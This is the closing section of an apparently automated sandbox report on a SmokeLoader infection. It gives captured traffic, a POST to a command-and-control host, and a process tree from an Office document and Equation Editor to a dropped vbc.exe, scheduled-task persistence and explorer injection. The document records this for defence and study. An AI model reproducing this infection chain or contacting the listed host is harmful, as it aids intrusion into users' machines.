43 1f 8d 67 86 43 05 aa 0a 39 3c 6e 99 d0 1e 87 59 d7 e0 f0 eb 41 cb d1 12 70 dd d3 d1 b0 28 ee ee 48 ed 41 73 f1 17 05 33 83 f7 9c 6f e6 61 89 df cc 47 8d 9b 0b 69 c1 1f f9 6c 2b 22 1e e8 ea f8 7a bb 7f d7 b9 1a 26 18 2d d9 8a 5b d0 9c 91 c8 c8 be 4a 34 1c 18 72 1a 69 3d 1f fc 91 7c 90 7e 98 3f e8 66 e1 58 ad 21 39 12 7b b9 e6 d6 7d 48 2e d4 60 c4 8b 22 36 a1 ec d4 19 49 fa 7c 8a a4 29 5d ff 86 df af d7 4c e4 43 8e 68 8b e8 2e 1c fe 49 28 fb fb 0e da c2 82 ed b5 a1 4a 7d 5e 1b c3 0c 26 a4 3c b6 48 7a 4d ea 03 22 25 14 97 c9 ae 54 d2 3a 81 50 a5 ae f5 8f 5a 90 2d ea 0b 75 d2 eb 5d 00 3c 7d fe 4c 27 57 84 09 75 93 ab dd 9d e2 de 6e a0 9d a4 8e 79 9e 49 07 a4 8c b2 cc 18 1d b4 86 c8 6d 3c 77 0b 3c 4a d1 86 f9 37 17 43 89 46 2d e9 bf eb 8b 02 1c a0 a9 f0 f7 ce f7 5a f2 d8 a3 ce 7f 1a b5 32 99 af a4 9a 52 fd 29 b8 b9 76 83 14 ad cf 3a 42 ba 01 1a f6 f4 ce 8a 07 1b c0 b7 b8 19 6c 3a 53 90 4e ac 21 50 4e 0a 65 79 a4 a2 0b 68 d7 18 8f bc 84 88 72 fe 13 ff 41 9d 0c 8e a0 2b 61 47 99 59 04 c5 5b 01 c0 f4 6d d7 2e 41 6b 2f 16 d0 5f 95 f3 2f 11 df 33 6d cd f3 7c 21 d3 0a d9 3a 6b 5c 9a 1f e6 d0 11 8a c5 ee 0d 9b 63 b9 76 90 f7 ad e6 60 11 b2 8d b9 52 2e fa c6 79 76 9b ff 26 4b d4 8b 90 31 1c 75 7f 84 d6 6c 7f db 0e a5 95 8b a1 dd 22 31 7f a1 8c 8f 00 99 98 85 e4 ea a1 94 df 6a f3 e7 1c dc 7e 5d 9f f7 88 d3 f5 73 1a 84 d2 1d 16 8d a2 c2 d2 28 11 cc f1 7f e0 6b 93 26 3f 89 ca 56 15 34 dc 8e f4 f2 35 1f 4e 59 4e fc c1 3e ac 07 09 72 6a 40 de 41 39 46 9a eb 4f c8 d0 64 a2 f0 f7 65 9f 82 d0 5b 0b b9 e7 89 0d e0 c7 19 53 aa 1f 72 06 ed 6f 39 5a 2d cf 7e 9d 4a d1 de 7e f9 1e 97 9f d8 54 a0 41 9b 40 99 33 20 c9 39 f1 bc 20 1c f6 a0 fd c3 66 af 0e 79 17 f5 eb 8f b2 0b 44 ef 71 c3 59 d9 61 c8 6e 80 75 c4 f9 f8 14 93 c2 26 2c ef 10 85 ba 8a 5f ba fa 87 75 f3 49 93 d6 6a 3e dc 9e 4e 73 00 d0 a4 58 e7 6c e3 ae 1e c0 cd 32 eb 6f 1e 3c 21 21 06 55 2d 17 eb 81 40 dc 24 52 9a e8 f8 45 56 53 0f 5e f5 49 d4 01 33 16 7e 39 b9 8c f0 40 ee 9f ed c9 a6 18 35 56 49 18 dd 6a 17 18 ca 8a ef f7 c3 37 57 64 6b 0b 46 a6 81 35 bd 62 ed e1 b7 84 e9 cf 1e 8b f3 c5 85 ef d6 b2 6c 90 29 21 a5 b0 3e 16 39 aa 74 d3 7e 2d 1d 61 c6 4d 8f 83 5b b4 64 63 96 2a d1 3a 82 17 55 d0 b1 4a b3 0b e7 4e 09 c5 f1 f2 af ff fc ad 48 0d 21 cd 7a 16 12 89 b1 4f 48 e4 bf 9a 3a 35 96 ab 96 e9 b0 6d 9d bd b6 4a ae 4f bc 55 4b 4a 4b 0e a2 e3 10 72 8e 8d 64 52 8d 62 a2 3d 5e 3c 37 8f 15 fd 23 f1 ae 53 12 ec a7 61 96 3c 11 b7 da 9e 8b 2f fa 33 75 2c f3 c6 17 c7 f5 9b 40 ab 33 1a 32 f0 60 6c 6c 64 a0 1a 16 78 bc 49 65 3e d8 fa c6 f2 29 b2 f9 90 39 ee cc 0f 58 02 48 Data Ascii: 52ce7_'S)]?,\|W+rOwN=!<f.d.6s<WIl87`HT'vdl'Mf\C;g=(_\FM_;l?1eNk_v:vj,B}e}\|G#MZ+Od'T'b.QbI~7AZVfCgC9<nYAp(HAs3oaGil+"z&-[J4ri=\|~?fX!9{}H.`"6I\|)]LCh.I(J}^&<HzM"%T:PZ-u]<}L'WunyIm<w<J7CF-Z2R)v:Bl:SN!PNeyhrA+aGY[m.Ak/_/3m\|!:k\cv`R.yv&K1ul"1j~]s(k&?V45NYN>rj@A9FOde[Sro9Z-~J~TA@3 9 fyDqYanu&,_uIj>NsXl2o<!!U-@$REVS^I3~9@5VIj7WdkF5bl)!>9t~-aM[dc*:UJNH!zOH:5mJOUKJKrdRb=^<7#Sa</3u,@32`lldxIe>)9XH
May 16, 2023 12:57:42.937772036 CEST	1083	IN	Data Raw: df 5a 81 ea df 9e 59 77 74 fd 77 67 29 c3 78 01 d9 96 16 37 87 bd f5 4b 78 29 e6 32 bb c0 30 4f 4b 4a 7d 03 89 0a b9 95 66 27 01 a4 57 52 39 56 07 61 aa 29 e1 45 3b a0 e5 af 36 b2 08 3f 3c 26 af 77 b2 4d fe 50 6e 91 09 1b d7 73 18 d2 26 d6 d4 7e Data Ascii: ZYwtwg)x7Kx)20OKJ}f'WR9Va)E;6?<&wMPns&~.8\c8n=OYgi?._L{?{]qK_[SYYd#$WEmpSI`l!:Z}!n]%=ip5@}
May 16, 2023 12:57:42.939054012 CEST	1084	IN	Data Raw: 6a f0 c5 ff a1 a2 71 7d 79 26 86 bb 7e 38 46 f3 31 95 e6 82 eb c4 0b 36 6d 51 a8 7f 92 33 7a b9 96 ae 6d 8c 84 24 7e e1 11 85 c0 09 07 f4 cb 43 db 2c 5e 56 b5 0a ec 9e 9f 12 69 58 c0 0d f9 35 cf b8 19 b1 51 38 32 62 fa 68 38 09 72 65 43 8b e3 5c Data Ascii: jq}y&~8F16mQ3zm$~C,^ViX5Q82bh8reC\"6y;]+%b~T5S}&oOVsXCR:Ywpti_6<0iTSf^fg%zpmafatO:
May 16, 2023 12:57:42.939105988 CEST	1085	IN	Data Raw: 7a b1 eb 9c cf 46 a2 50 00 b7 3d f4 7a fc c4 5d 42 8b 1b 0e c6 9c d1 0c 15 88 05 a7 d2 30 55 cc b9 28 e6 f1 3c 0a 44 18 87 8c 6f 15 a5 59 bc 6a a1 6d d7 ca a6 15 8a 53 85 be 15 f0 0e af f8 af 1d 94 70 0e d7 f7 50 01 3b ed 5f cf 98 8f d1 94 9d a2 Data Ascii: zFP=z]B0U(<DoYjmSpP;_l{K>vKrscY[Sy"Fk(ukQ]OaEB7JT)w.]'yw$TR4P(vh+46%3{+G**
May 16, 2023 12:57:42.940604925 CEST	1087	IN	Data Raw: 1b 65 38 1a 51 cd 3d 65 81 a4 25 19 c4 d8 5b 2b a9 d3 d4 19 a6 67 63 0c 51 48 74 8e 16 8e 8b a1 0c e9 2d d5 b1 23 35 28 37 97 ad 57 6b e2 f2 26 4a 26 5f 15 31 49 28 d9 3d 59 d8 37 44 a4 39 36 5d 6f f0 5c 35 dc 5d d6 f7 d0 50 fb 83 2f d3 78 74 e8 Data Ascii: e8Q=e%[+gcQHt-#5(7Wk&J&_1I(=Y7D96]o\5]P/xtsk<#UAv.EaEVamJN8_9{ _^`6zJSbf+zHmj@*~>Dfo8% h{T4j=\|}3U7:[% 6),`zXS(OX<-
May 16, 2023 12:57:42.940654993 CEST	1088	IN	Data Raw: 5e 47 4c 3b 6b fd 03 ad e5 66 44 75 b1 c3 54 14 88 e6 59 d6 3c 0b c3 fe 81 a0 9e d8 ae 1b cd cb 29 14 ee 23 f9 59 6e a7 91 ef 8d 57 f2 39 e8 56 79 d0 44 1f e7 14 53 3c 60 ec 69 97 a1 66 f0 d9 3e d9 b1 4f 9d 75 9b ab 54 b0 01 0e 18 31 15 19 0f ef Data Ascii: ^GL;kfDuTY<)#YnW9VyDS<`if>OuT1j,-~ajZ,1f]-u kLJ.e)hYc6poG'\VRAPC:~PU[ttnv2Es}LR*-a=)tO%A~Nq\|
May 16, 2023 12:57:42.942037106 CEST	1089	IN	Data Raw: f0 f0 32 1c 6a 73 c4 0b 97 25 3c 99 5a 70 76 25 74 55 46 c0 2a 04 85 3f d7 ce b7 70 12 fa 35 0f 5f c0 10 db 3d d8 08 12 df ff c5 95 ff 4b 50 7a 4d c2 f1 7b 4d d8 5c 43 57 86 fc a1 7d 0f be 4a 32 96 0b 5d 98 c5 00 e5 0b 66 ab 4c 8a 7b 2e 36 12 96 Data Ascii: 2js%<Zpv%tUF*?p5_=KPzM{M\CW}J2]fL{.6f>pD(\|R>6[&sQOzDE,<.IQn_YtX]}.B~>u1 6FsymXeG?mfi0^fg4VjAIxpBe%H
May 16, 2023 12:57:42.942157030 CEST	1091	IN	Data Raw: 64 ef a9 7a c4 c5 8e fc c7 a7 4b 63 84 94 bb 2e 37 97 dd fb 68 ac 30 fc 73 90 48 3f 5d cc f5 d5 55 08 a2 5e 2d 80 10 2c 85 2b 4a 9d df f2 59 84 93 bc 5e 8d 1a c1 d2 e3 f3 7a bc 91 43 ef de 81 f8 09 68 61 c9 04 aa 7d 60 9d 3b 48 6d 4c bb 87 c2 ca Data Ascii: dzKc.7h0sH?]U^-,+JY^zCha}`;HmLVoIga}rG]r<Nkk%csf#'/5n6R$_5yuS^r?LhCh>kZzbz"&]rdBB0>Qqj0*CE
May 16, 2023 12:57:42.942246914 CEST	1092	IN	Data Raw: 38 c3 66 bb a0 18 f0 30 04 32 a9 10 2f da ca 55 1a b6 2d 69 c4 9a d9 b6 16 f6 e1 ae f6 37 d5 60 99 2c 5e df 22 b1 89 dd fa f6 50 6b e8 4f ad ef a6 20 6e a5 e9 0e 76 d7 b3 ad c7 46 cb 1b 0d 42 95 73 8f a3 3e 2a d6 08 57 8a 68 5e 7f 22 fa 0a 8c 28 Data Ascii: 8f02/U-i7`,^"PkO nvFBs>*Wh^"(AM!"h8ePUg)yG8@-{FV>a6 gqUD\G}l\|^[WqHZYg[Ax=&^U4>V$v{WuX
May 16, 2023 12:57:42.943670034 CEST	1093	IN	Data Raw: 5a 13 c4 7d 25 af 95 57 0a a5 99 16 0a ab 93 4f b1 2e 0a 29 47 ea b7 f1 65 b9 41 75 5a 14 fc 2d 26 df 21 9a 66 bb f1 6c d1 a7 6f 35 86 9a 8b 39 f4 00 7a 85 4c d4 81 82 45 e8 fa 78 d0 aa 4f c9 82 8f da 3e 0b 39 36 e1 e5 97 01 4c 82 9d 52 b3 34 40 Data Ascii: Z}%WO.)GeAuZ-&!flo59zLExO>96LR4@*(HXCQYw(>B4`n['.YCcJk43/RKqo!i:_GU>zP&ngpv=Uf~We{:}%s(ee5w$#^{k
May 16, 2023 12:57:43.128118038 CEST	1095	IN	Data Raw: d8 ca 09 9c 41 e3 60 2c 26 0f 41 94 e4 53 a3 ae c6 b7 17 da b1 28 22 6f f5 7d 1e 97 20 c0 d0 fb 2b 58 83 71 62 1c a0 59 a4 e7 e4 32 e3 c8 26 9e 7c bb 00 f6 23 f6 75 e6 06 17 33 1c 78 e0 80 17 91 68 95 3c 23 3f e7 34 46 96 68 79 07 d9 c5 eb 41 df Data Ascii: A`,&AS("o} +XqbY2&\|#u3xh<#?4FhyA,N<I!RMSl5#M,QKG1U[.! k0^mnAv}OY-G@qfT@b(Pvn#FER[Ap_/FH&

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49173	23.230.13.96	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 16, 2023 12:57:57.685664892 CEST	1433	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dropbuyinc.ga/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 1305 Host: dropbuyinc.ga
May 16, 2023 12:57:57.685722113 CEST	1435	OUT	Data Raw: 6e e2 e2 88 b3 3d f0 12 6e 13 b2 67 48 59 f8 8e a9 53 e8 27 32 fd cb e3 f7 9c 7a 6e dc 3d 42 75 32 b9 9d b9 07 d1 88 d3 13 bd c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 4d 92 f8 a2 Data Ascii: n=ngHYS'2zn=Bu2eug]H8.6hEvRY;PLMOc~k_!z1rJC\S7Wx>x :xGresnq~T@jvE)\=>O@W6%_Q.,})!s~2i~
May 16, 2023 12:57:58.087845087 CEST	1435	IN	HTTP/1.1 404 Not Found Date: Tue, 16 May 2023 10:57:57 GMT Server: Apache/2.4.56 (Debian) Content-Length: 401 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 72 6f 70 62 75 79 69 6e 63 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at dropbuyinc.ga Port 80</address></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 868, Parent PID: 576

General

Target ID:	0
Start time:	12:55:23
Start date:	16/05/2023
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f510000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 2468, Parent PID: 576

General

Target ID:	2
Start time:	12:55:46
Start date:	16/05/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 972, Parent PID: 2468

General

Target ID:	5
Start time:	12:55:51
Start date:	16/05/2023
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0xfa30000
File size:	1014136 bytes
MD5 hash:	BC8DFCB4093F0BB356E3103AF15F3D1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 1664, Parent PID: 972

General

Target ID:	6
Start time:	12:55:53
Start date:	16/05/2023
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xfa30000
File size:	1014136 bytes
MD5 hash:	BC8DFCB4093F0BB356E3103AF15F3D1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: AcroRd32.exePID: 1540, Parent PID: 576

General

Target ID:	7
Start time:	12:55:53
Start date:	16/05/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Imagebase:	0xca0000
File size:	2525680 bytes
MD5 hash:	2F8D93826B8CBF9290BC57535C7A6817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 1860, Parent PID: 1664

General

Target ID:	9
Start time:	12:55:59
Start date:	16/05/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xff040000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: RdrCEF.exePID: 3260, Parent PID: 1540

General

Target ID:	10
Start time:	12:56:00
Start date:	16/05/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Imagebase:	0x390000
File size:	9805808 bytes
MD5 hash:	326A645391A97C760B60C558A35BB068
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: WINWORD.EXEPID: 2228, Parent PID: 576

General

Target ID:	12
Start time:	12:56:25
Start date:	16/05/2023
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13fb70000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskeng.exePID: 2056, Parent PID: 876

General

Target ID:	14
Start time:	12:56:54
Start date:	16/05/2023
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {83B777CB-BA22-4166-AE7C-A3886C747AE4} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff590000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rirjijjPID: 3712, Parent PID: 2056

General

Target ID:	15
Start time:	12:56:58
Start date:	16/05/2023
Path:	C:\Users\user\AppData\Roaming\rirjijj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rirjijj
Imagebase:	0xfa30000
File size:	1014136 bytes
MD5 hash:	BC8DFCB4093F0BB356E3103AF15F3D1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 4012, Parent PID: 576

General

Target ID:	16
Start time:	12:56:58
Start date:	16/05/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3872, Parent PID: 1860

General

Target ID:	18
Start time:	12:57:02
Start date:	16/05/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xba0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 3444, Parent PID: 4012

General

Target ID:	19
Start time:	12:57:03
Start date:	16/05/2023
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0xfa30000
File size:	1014136 bytes
MD5 hash:	BC8DFCB4093F0BB356E3103AF15F3D1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3776, Parent PID: 1860

General

Target ID:	20
Start time:	12:57:03
Start date:	16/05/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff040000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rirjijjPID: 4004, Parent PID: 3712

General

Target ID:	21
Start time:	12:57:04
Start date:	16/05/2023
Path:	C:\Users\user\AppData\Roaming\rirjijj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rirjijj
Imagebase:	0xfa30000
File size:	1014136 bytes
MD5 hash:	BC8DFCB4093F0BB356E3103AF15F3D1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3724, Parent PID: 1860

General

Target ID:	22
Start time:	12:57:05
Start date:	16/05/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xba0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 3436, Parent PID: 3444

General

Target ID:	23
Start time:	12:57:06
Start date:	16/05/2023
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xfa30000
File size:	1014136 bytes
MD5 hash:	BC8DFCB4093F0BB356E3103AF15F3D1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3812, Parent PID: 1860

General

Target ID:	24
Start time:	12:57:06
Start date:	16/05/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xba0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4020, Parent PID: 1860

General

Target ID:	25
Start time:	12:57:08
Start date:	16/05/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff040000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3432, Parent PID: 1860

General

Target ID:	26
Start time:	12:57:10
Start date:	16/05/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xba0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.1194343464.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3532, Parent PID: 1860

General

Target ID:	27
Start time:	12:57:13
Start date:	16/05/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff040000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001B.00000002.1194283601.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 1492, Parent PID: 1860

General

Target ID:	28
Start time:	12:57:14
Start date:	16/05/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xba0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 1796, Parent PID: 1860

General

Target ID:	29
Start time:	12:57:16
Start date:	16/05/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff040000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

